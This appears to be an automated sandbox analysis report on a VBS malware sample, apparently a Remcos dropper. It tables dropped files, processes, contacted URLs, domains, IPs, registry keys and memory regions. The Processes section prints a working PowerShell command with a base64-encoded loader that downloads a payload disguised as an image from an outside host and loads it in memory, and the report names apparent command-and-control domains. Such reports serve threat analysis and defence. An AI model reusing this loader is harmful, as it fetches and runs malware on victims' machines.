Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Aktarma,pdf.vbs
|
Unicode text, UTF-16, little-endian text, with very long lines (3244), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\classers.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage user DataBase, version 0x620, checksum 0x71f4ec36, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a32j0lwm.w2c.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yls3mn5v.w5b.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled
= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\classers.vbs"
|
|
|
|
C:\Windows\System32\wscript.exe
|
wscript.exe C:\ProgramData\classers.vbs
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
sun.drillmmcsnk.eu
|
|
||
|
firewarzone.ydns.eu
|
|
||
|
rem.pushswroller.eu
|
|
||
|
http://geoplugin.net/json.gp-V)
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://geoplugin.net/json.gpSystem32
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://www.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gpVT
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
|
https://res.cloudinary.com
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
http://geoplugin.net/json.gpal
|
unknown
|
||
|
http://geoplugin.net/json.gp(V
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
https://paste.ee/r/TZC1n/0
|
172.67.187.200
|
||
|
http://geoplugin.net/json.gp%h
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
|
151.101.1.137
|
There are 20 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
rem.pushswroller.eu
|
45.80.158.30
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
|
paste.ee
|
172.67.187.200
|
||
|
geoplugin.net
|
178.237.33.50
|
||
|
cloudinary.map.fastly.net
|
151.101.1.137
|
||
|
s-part-0035.t-0009.t-msedge.net
|
13.107.246.63
|
||
|
ax-0001.ax-msedge.net
|
150.171.27.10
|
||
|
fp2e7a.wpc.phicdn.net
|
192.229.221.95
|
||
|
res.cloudinary.com
|
unknown
|
||
|
tse1.mm.bing.net
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
45.80.158.30
|
rem.pushswroller.eu
|
Netherlands
|
|
|
|
172.67.187.200
|
paste.ee
|
United States
|
||
|
151.101.1.137
|
cloudinary.map.fastly.net
|
United States
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmcghghyrtssxr-7RL1P2
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmcghghyrtssxr-7RL1P2
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmcghghyrtssxr-7RL1P2
|
time
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 8 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2D9F000
|
stack
|
page read and write
|
|
|
|
1208000
|
heap
|
page read and write
|
|
|
|
1223000
|
heap
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
2DC70CA2000
|
heap
|
page read and write
|
||
|
1C01F40B000
|
heap
|
page read and write
|
||
|
473000
|
remote allocation
|
page execute and read and write
|
||
|
1E7B1C6D000
|
trusted library allocation
|
page read and write
|
||
|
1E7B1C59000
|
trusted library allocation
|
page read and write
|
||
|
E9728FF000
|
stack
|
page read and write
|
||
|
3D3E000
|
stack
|
page read and write
|
||
|
29FFBC91000
|
heap
|
page read and write
|
||
|
F0D107E000
|
stack
|
page read and write
|
||
|
F0D0D7E000
|
stack
|
page read and write
|
||
|
1C01D457000
|
heap
|
page read and write
|
||
|
114E000
|
stack
|
page read and write
|
||
|
2DC6BF00000
|
heap
|
page read and write
|
||
|
E972FFC000
|
stack
|
page read and write
|
||
|
1C01F406000
|
heap
|
page read and write
|
||
|
29FFA00A000
|
heap
|
page read and write
|
||
|
1E7B1840000
|
heap
|
page execute and read and write
|
||
|
1472F3A0000
|
heap
|
page read and write
|
||
|
2DC6C680000
|
trusted library allocation
|
page read and write
|
||
|
2DC70B10000
|
trusted library allocation
|
page read and write
|
||
|
2DC6B67A000
|
heap
|
page read and write
|
||
|
29FFBC51000
|
heap
|
page read and write
|
||
|
29FFBC51000
|
heap
|
page read and write
|
||
|
1E7B1C69000
|
trusted library allocation
|
page read and write
|
||
|
29FF9F50000
|
heap
|
page read and write
|
||
|
1C01F468000
|
heap
|
page read and write
|
||
|
1E7AFBBC000
|
heap
|
page read and write
|
||
|
1C01F3E5000
|
heap
|
page read and write
|
||
|
29FFA00A000
|
heap
|
page read and write
|
||
|
1C0212C0000
|
trusted library allocation
|
page read and write
|
||
|
F0D1A7E000
|
stack
|
page read and write
|
||
|
F0D11FB000
|
stack
|
page read and write
|
||
|
2DC70B20000
|
trusted library allocation
|
page read and write
|
||
|
1C01F43B000
|
heap
|
page read and write
|
||
|
1E7B1770000
|
heap
|
page execute and read and write
|
||
|
1E7AFC53000
|
heap
|
page read and write
|
||
|
2DC6BE15000
|
heap
|
page read and write
|
||
|
2DC6B702000
|
heap
|
page read and write
|
||
|
29FFBBEE000
|
heap
|
page read and write
|
||
|
F0D01FE000
|
unkown
|
page readonly
|
||
|
29FF9D80000
|
heap
|
page read and write
|
||
|
1C01F468000
|
heap
|
page read and write
|
||
|
F0D0A7E000
|
stack
|
page read and write
|
||
|
2DC70CC8000
|
heap
|
page read and write
|
||
|
1C01F461000
|
heap
|
page read and write
|
||
|
29FFBC48000
|
heap
|
page read and write
|
||
|
2DC70AA0000
|
trusted library allocation
|
page read and write
|
||
|
6409FF000
|
stack
|
page read and write
|
||
|
1247000
|
heap
|
page read and write
|
||
|
29FFBC51000
|
heap
|
page read and write
|
||
|
1C01F417000
|
heap
|
page read and write
|
||
|
29FFBC3D000
|
heap
|
page read and write
|
||
|
1C01F407000
|
heap
|
page read and write
|
||
|
1C01F401000
|
heap
|
page read and write
|
||
|
1C01F7D5000
|
heap
|
page read and write
|
||
|
F0D05FE000
|
unkown
|
page readonly
|
||
|
29FF9E60000
|
heap
|
page read and write
|
||
|
1E7B306D000
|
trusted library allocation
|
page read and write
|
||
|
2DC6B673000
|
heap
|
page read and write
|
||
|
2DC6B65D000
|
heap
|
page read and write
|
||
|
1E7AFBD0000
|
heap
|
page read and write
|
||
|
1C01D690000
|
heap
|
page read and write
|
||
|
29FF9E53000
|
heap
|
page read and write
|
||
|
640AFF000
|
stack
|
page read and write
|
||
|
29FF9D40000
|
heap
|
page read and write
|
||
|
2DC6B67D000
|
heap
|
page read and write
|
||
|
FD0000
|
heap
|
page read and write
|
||
|
2DC6C570000
|
trusted library section
|
page readonly
|
||
|
F80000
|
heap
|
page read and write
|
||
|
1E7B6C6D000
|
trusted library allocation
|
page read and write
|
||
|
29FFBC51000
|
heap
|
page read and write
|
||
|
2DC70CF4000
|
heap
|
page read and write
|
||
|
1C01F42B000
|
heap
|
page read and write
|
||
|
29FFBC51000
|
heap
|
page read and write
|
||
|
36EE000
|
stack
|
page read and write
|
||
|
29FFBC17000
|
heap
|
page read and write
|
||
|
2DC6B560000
|
heap
|
page read and write
|
||
|
2DC70CFA000
|
heap
|
page read and write
|
||
|
2DC6B695000
|
heap
|
page read and write
|
||
|
29FFBC17000
|
heap
|
page read and write
|
||
|
29FFBD1E000
|
heap
|
page read and write
|
||
|
1C01F300000
|
heap
|
page read and write
|
||
|
50D1EFC000
|
stack
|
page read and write
|
||
|
1C01F500000
|
heap
|
page read and write
|
||
|
1E7AFB70000
|
heap
|
page read and write
|
||
|
1E7B1630000
|
trusted library allocation
|
page read and write
|
||
|
476000
|
remote allocation
|
page execute and read and write
|
||
|
1C01F90F000
|
heap
|
page read and write
|
||
|
64033A000
|
stack
|
page read and write
|
||
|
29FFA00A000
|
heap
|
page read and write
|
||
|
1C01F40C000
|
heap
|
page read and write
|
||
|
F3B000
|
stack
|
page read and write
|
||
|
3AEE000
|
stack
|
page read and write
|
||
|
1C01F3EF000
|
heap
|
page read and write
|
||
|
29FFBC31000
|
heap
|
page read and write
|
||
|
50D308B000
|
stack
|
page read and write
|
||
|
1C01D410000
|
heap
|
page read and write
|
||
|
1C01F46A000
|
heap
|
page read and write
|
||
|
50D1BEE000
|
stack
|
page read and write
|
||
|
29FFBBE7000
|
heap
|
page read and write
|
||
|
2DC6BE00000
|
heap
|
page read and write
|
||
|
1E7AFD75000
|
heap
|
page read and write
|
||
|
2DC6BF13000
|
heap
|
page read and write
|
||
|
2DC70C80000
|
trusted library allocation
|
page read and write
|
||
|
2DC6B6B2000
|
heap
|
page read and write
|
||
|
2DC70C55000
|
heap
|
page read and write
|
||
|
2F9F000
|
stack
|
page read and write
|
||
|
2DC70EC0000
|
remote allocation
|
page read and write
|
||
|
29FFBC12000
|
heap
|
page read and write
|
||
|
2DC70E00000
|
trusted library allocation
|
page read and write
|
||
|
119C000
|
stack
|
page read and write
|
||
|
29FF9E50000
|
heap
|
page read and write
|
||
|
1C01F43B000
|
heap
|
page read and write
|
||
|
50D23BE000
|
stack
|
page read and write
|
||
|
1C01D418000
|
heap
|
page read and write
|
||
|
29FF9DE2000
|
heap
|
page read and write
|
||
|
29FF9E65000
|
heap
|
page read and write
|
||
|
29FFBBE1000
|
heap
|
page read and write
|
||
|
29FFA00C000
|
heap
|
page read and write
|
||
|
F0D09FE000
|
unkown
|
page readonly
|
||
|
1C01F301000
|
heap
|
page read and write
|
||
|
2DC70C70000
|
trusted library allocation
|
page read and write
|
||
|
F0D10FE000
|
unkown
|
page readonly
|
||
|
2DC72000000
|
heap
|
page read and write
|
||
|
29FFBBFD000
|
heap
|
page read and write
|
||
|
29FF9DAA000
|
heap
|
page read and write
|
||
|
2DC70B60000
|
trusted library allocation
|
page read and write
|
||
|
2DC70C1F000
|
heap
|
page read and write
|
||
|
1C01F700000
|
heap
|
page read and write
|
||
|
2DC6BE02000
|
heap
|
page read and write
|
||
|
F0D0B7E000
|
stack
|
page read and write
|
||
|
50D300D000
|
stack
|
page read and write
|
||
|
29FFBBE1000
|
heap
|
page read and write
|
||
|
50D1AE3000
|
stack
|
page read and write
|
||
|
29FFBC29000
|
heap
|
page read and write
|
||
|
29FFBC51000
|
heap
|
page read and write
|
||
|
2DC70B50000
|
trusted library allocation
|
page read and write
|
||
|
1263000
|
heap
|
page read and write
|
||
|
2DC6C540000
|
trusted library section
|
page readonly
|
||
|
29FFBC51000
|
heap
|
page read and write
|
||
|
2DC6B713000
|
heap
|
page read and write
|
||
|
1C01F414000
|
heap
|
page read and write
|
||
|
29FF9E68000
|
heap
|
page read and write
|
||
|
1E7AFCE0000
|
trusted library allocation
|
page read and write
|
||
|
1E7AFB40000
|
heap
|
page read and write
|
||
|
2DC70B50000
|
trusted library allocation
|
page read and write
|
||
|
1E7B266D000
|
trusted library allocation
|
page read and write
|
||
|
1E7B1C5B000
|
trusted library allocation
|
page read and write
|
||
|
1C01D464000
|
heap
|
page read and write
|
||
|
1E7AFC69000
|
heap
|
page read and write
|
||
|
3C3E000
|
stack
|
page read and write
|
||
|
29FF9E50000
|
heap
|
page read and write
|
||
|
1C01D440000
|
heap
|
page read and write
|
||
|
E972EFF000
|
stack
|
page read and write
|
||
|
1472F3A4000
|
heap
|
page read and write
|
||
|
1310000
|
heap
|
page read and write
|
||
|
1035000
|
heap
|
page read and write
|
||
|
1C01F3E5000
|
heap
|
page read and write
|
||
|
29FF9E66000
|
heap
|
page read and write
|
||
|
50D253C000
|
stack
|
page read and write
|
||
|
2DC70CF0000
|
heap
|
page read and write
|
||
|
29FFBC02000
|
heap
|
page read and write
|
||
|
2DC6C550000
|
trusted library section
|
page readonly
|
||
|
1E7B1C61000
|
trusted library allocation
|
page read and write
|
||
|
2DC6B5A0000
|
trusted library allocation
|
page read and write
|
||
|
1C01F3EF000
|
heap
|
page read and write
|
||
|
E9729FF000
|
stack
|
page read and write
|
||
|
1C01D44C000
|
heap
|
page read and write
|
||
|
2DC70B20000
|
trusted library allocation
|
page read and write
|
||
|
1C01F400000
|
heap
|
page read and write
|
||
|
2DC70EC0000
|
remote allocation
|
page read and write
|
||
|
1C01F407000
|
heap
|
page read and write
|
||
|
1C01D431000
|
heap
|
page read and write
|
||
|
640CFE000
|
stack
|
page read and write
|
||
|
6407FE000
|
stack
|
page read and write
|
||
|
F0D0CFE000
|
unkown
|
page readonly
|
||
|
1C01F453000
|
heap
|
page read and write
|
||
|
2DC6CAA0000
|
trusted library allocation
|
page read and write
|
||
|
1C01F3E2000
|
heap
|
page read and write
|
||
|
1C01D600000
|
heap
|
page read and write
|
||
|
29FFA005000
|
heap
|
page read and write
|
||
|
29FF9E5B000
|
heap
|
page read and write
|
||
|
2DC6C590000
|
trusted library section
|
page readonly
|
||
|
1472EF40000
|
heap
|
page read and write
|
||
|
37EF000
|
stack
|
page read and write
|
||
|
2DC6BDF0000
|
trusted library allocation
|
page read and write
|
||
|
2DC6B640000
|
heap
|
page read and write
|
||
|
1472F1B0000
|
heap
|
page read and write
|
||
|
29FFBBF0000
|
heap
|
page read and write
|
||
|
F0D0AFE000
|
unkown
|
page readonly
|
||
|
29FFBC0A000
|
heap
|
page read and write
|
||
|
2DC6C440000
|
trusted library allocation
|
page read and write
|
||
|
50D1E7E000
|
stack
|
page read and write
|
||
|
1C01F43B000
|
heap
|
page read and write
|
||
|
2DC70B64000
|
trusted library allocation
|
page read and write
|
||
|
321F000
|
stack
|
page read and write
|
||
|
1E7B1A72000
|
trusted library allocation
|
page read and write
|
||
|
50D243D000
|
stack
|
page read and write
|
||
|
1472EF10000
|
heap
|
page read and write
|
||
|
1472EF20000
|
heap
|
page read and write
|
||
|
F0D13FC000
|
stack
|
page read and write
|
||
|
1E7B8A6D000
|
trusted library allocation
|
page read and write
|
||
|
50D207E000
|
stack
|
page read and write
|
||
|
50D24BE000
|
stack
|
page read and write
|
||
|
2FDE000
|
stack
|
page read and write
|
||
|
F0D03FE000
|
unkown
|
page readonly
|
||
|
F0D0F7E000
|
stack
|
page read and write
|
||
|
2DC70B7E000
|
trusted library allocation
|
page read and write
|
||
|
F0D14FE000
|
unkown
|
page readonly
|
||
|
1C01F417000
|
heap
|
page read and write
|
||
|
29FFBC51000
|
heap
|
page read and write
|
||
|
1E7AFB20000
|
heap
|
page read and write
|
||
|
50D2F0E000
|
stack
|
page read and write
|
||
|
2DC6BF02000
|
heap
|
page read and write
|
||
|
29FFBD49000
|
heap
|
page read and write
|
||
|
2DC6C580000
|
trusted library section
|
page readonly
|
||
|
29FFBBE4000
|
heap
|
page read and write
|
||
|
1472EFEB000
|
heap
|
page read and write
|
||
|
29FF9DF0000
|
heap
|
page read and write
|
||
|
29FFBC46000
|
heap
|
page read and write
|
||
|
1C01F2D0000
|
heap
|
page read and write
|
||
|
1030000
|
heap
|
page read and write
|
||
|
2DC6BF5A000
|
heap
|
page read and write
|
||
|
F0CFEFE000
|
unkown
|
page readonly
|
||
|
1E7B1525000
|
heap
|
page read and write
|
||
|
29FFBC51000
|
heap
|
page read and write
|
||
|
1C01D400000
|
heap
|
page read and write
|
||
|
F0D0C7E000
|
stack
|
page read and write
|
||
|
1E7B1777000
|
heap
|
page execute and read and write
|
||
|
382D000
|
stack
|
page read and write
|
||
|
1C01D42D000
|
heap
|
page read and write
|
||
|
1E7B586D000
|
trusted library allocation
|
page read and write
|
||
|
3BEF000
|
stack
|
page read and write
|
||
|
1E7B626D000
|
trusted library allocation
|
page read and write
|
||
|
29FF9DBD000
|
heap
|
page read and write
|
||
|
29FFBBED000
|
heap
|
page read and write
|
||
|
1C01D5E0000
|
heap
|
page read and write
|
||
|
2DC6B690000
|
heap
|
page read and write
|
||
|
29FF9FE0000
|
heap
|
page read and write
|
||
|
1C01F41C000
|
heap
|
page read and write
|
||
|
29FFBC51000
|
heap
|
page read and write
|
||
|
124A000
|
heap
|
page read and write
|
||
|
E3C000
|
stack
|
page read and write
|
||
|
2DC70D0A000
|
heap
|
page read and write
|
||
|
29FF9E14000
|
heap
|
page read and write
|
||
|
1472EFE0000
|
heap
|
page read and write
|
||
|
E9725FE000
|
stack
|
page read and write
|
||
|
1E7B1C51000
|
trusted library allocation
|
page read and write
|
||
|
2DC70CFE000
|
heap
|
page read and write
|
||
|
6406FE000
|
stack
|
page read and write
|
||
|
29FFBD26000
|
heap
|
page read and write
|
||
|
2DC70B40000
|
trusted library allocation
|
page read and write
|
||
|
29FFA000000
|
heap
|
page read and write
|
||
|
127B000
|
heap
|
page read and write
|
||
|
1C01F430000
|
heap
|
page read and write
|
||
|
F0D1AFE000
|
unkown
|
page readonly
|
||
|
1C01F410000
|
heap
|
page read and write
|
||
|
1C01D440000
|
heap
|
page read and write
|
||
|
29FF9DF0000
|
heap
|
page read and write
|
||
|
50D223C000
|
stack
|
page read and write
|
||
|
1E7B4E6D000
|
trusted library allocation
|
page read and write
|
||
|
1E7AFA40000
|
heap
|
page read and write
|
||
|
F0D06FC000
|
stack
|
page read and write
|
||
|
392E000
|
stack
|
page read and write
|
||
|
1C01F447000
|
heap
|
page read and write
|
||
|
1C01F3EF000
|
heap
|
page read and write
|
||
|
E972CFE000
|
stack
|
page read and write
|
||
|
29FFBBF6000
|
heap
|
page read and write
|
||
|
1E7B18D1000
|
trusted library allocation
|
page read and write
|
||
|
1472F3A5000
|
heap
|
page read and write
|
||
|
F0CFDF7000
|
stack
|
page read and write
|
||
|
2DC6BDC1000
|
trusted library allocation
|
page read and write
|
||
|
29FF9DA9000
|
heap
|
page read and write
|
||
|
F0D00FE000
|
stack
|
page read and write
|
||
|
2DC70D02000
|
heap
|
page read and write
|
||
|
2E9F000
|
stack
|
page read and write
|
||
|
1C01F420000
|
heap
|
page read and write
|
||
|
2DC6C101000
|
trusted library allocation
|
page read and write
|
||
|
2DC6B6B6000
|
heap
|
page read and write
|
||
|
2DC70CF8000
|
heap
|
page read and write
|
||
|
29FFBC53000
|
heap
|
page read and write
|
||
|
2DC6B6FF000
|
heap
|
page read and write
|
||
|
2DC6B570000
|
heap
|
page read and write
|
||
|
29FFBD57000
|
heap
|
page read and write
|
||
|
29FFBC20000
|
heap
|
page read and write
|
||
|
29FFA00A000
|
heap
|
page read and write
|
||
|
3A6B000
|
stack
|
page read and write
|
||
|
1E7B16D6000
|
heap
|
page read and write
|
||
|
2DC6B68E000
|
heap
|
page read and write
|
||
|
1C01F44D000
|
heap
|
page read and write
|
||
|
2DC6B678000
|
heap
|
page read and write
|
||
|
2DC70CFC000
|
heap
|
page read and write
|
||
|
F0D0BFE000
|
unkown
|
page readonly
|
||
|
311E000
|
stack
|
page read and write
|
||
|
50D1FFE000
|
stack
|
page read and write
|
||
|
1C01F701000
|
heap
|
page read and write
|
||
|
29FFBC91000
|
heap
|
page read and write
|
||
|
2DC6BF1A000
|
heap
|
page read and write
|
||
|
29FFBC05000
|
heap
|
page read and write
|
||
|
1C01F3D5000
|
heap
|
page read and write
|
||
|
2DC6BF1A000
|
heap
|
page read and write
|
||
|
29FFBC91000
|
heap
|
page read and write
|
||
|
1C01D674000
|
heap
|
page read and write
|
||
|
2DC70BF0000
|
trusted library allocation
|
page read and write
|
||
|
29FFBD13000
|
heap
|
page read and write
|
||
|
50D20F8000
|
stack
|
page read and write
|
||
|
1C01F434000
|
heap
|
page read and write
|
||
|
1E7AFBFA000
|
heap
|
page read and write
|
||
|
F0D0E7E000
|
stack
|
page read and write
|
||
|
2DC70E50000
|
trusted library allocation
|
page read and write
|
||
|
1200000
|
heap
|
page read and write
|
||
|
F0D08FB000
|
stack
|
page read and write
|
||
|
1C01F440000
|
heap
|
page read and write
|
||
|
2DC70CBF000
|
heap
|
page read and write
|
||
|
2B2B1FE000
|
unkown
|
page read and write
|
||
|
29FFBBF0000
|
heap
|
page read and write
|
||
|
2DC70C2C000
|
heap
|
page read and write
|
||
|
2B2B0FD000
|
stack
|
page read and write
|
||
|
2B2B2FF000
|
stack
|
page read and write
|
||
|
2DC70C59000
|
heap
|
page read and write
|
||
|
2DC70CE4000
|
heap
|
page read and write
|
||
|
1C01F417000
|
heap
|
page read and write
|
||
|
50D1F7E000
|
stack
|
page read and write
|
||
|
1C01D43B000
|
heap
|
page read and write
|
||
|
1C01F42B000
|
heap
|
page read and write
|
||
|
1C01D44B000
|
heap
|
page read and write
|
||
|
29FFBD27000
|
heap
|
page read and write
|
||
|
1150000
|
heap
|
page read and write
|
||
|
1E7B3A6D000
|
trusted library allocation
|
page read and write
|
||
|
2DC6B729000
|
heap
|
page read and write
|
||
|
11DC000
|
stack
|
page read and write
|
||
|
E972BFD000
|
stack
|
page read and write
|
||
|
1C01F402000
|
heap
|
page read and write
|
||
|
2DC70BF0000
|
trusted library allocation
|
page read and write
|
||
|
1C01F459000
|
heap
|
page read and write
|
||
|
2DC70C62000
|
heap
|
page read and write
|
||
|
29FF9E58000
|
heap
|
page read and write
|
||
|
50D1B6E000
|
stack
|
page read and write
|
||
|
50D21B7000
|
stack
|
page read and write
|
||
|
1E7AFBB0000
|
heap
|
page read and write
|
||
|
29FFA00D000
|
heap
|
page read and write
|
||
|
29FF9E63000
|
heap
|
page read and write
|
||
|
29FF9DA7000
|
heap
|
page read and write
|
||
|
1C01D43A000
|
heap
|
page read and write
|
||
|
29FF9E50000
|
heap
|
page read and write
|
||
|
1C01D431000
|
heap
|
page read and write
|
||
|
2DC70C00000
|
heap
|
page read and write
|
||
|
2DC70E70000
|
trusted library allocation
|
page read and write
|
||
|
F0D0DFE000
|
unkown
|
page readonly
|
||
|
1276000
|
heap
|
page read and write
|
||
|
F0D02FC000
|
stack
|
page read and write
|
||
|
1C01D42C000
|
heap
|
page read and write
|
||
|
2DC70E60000
|
trusted library allocation
|
page read and write
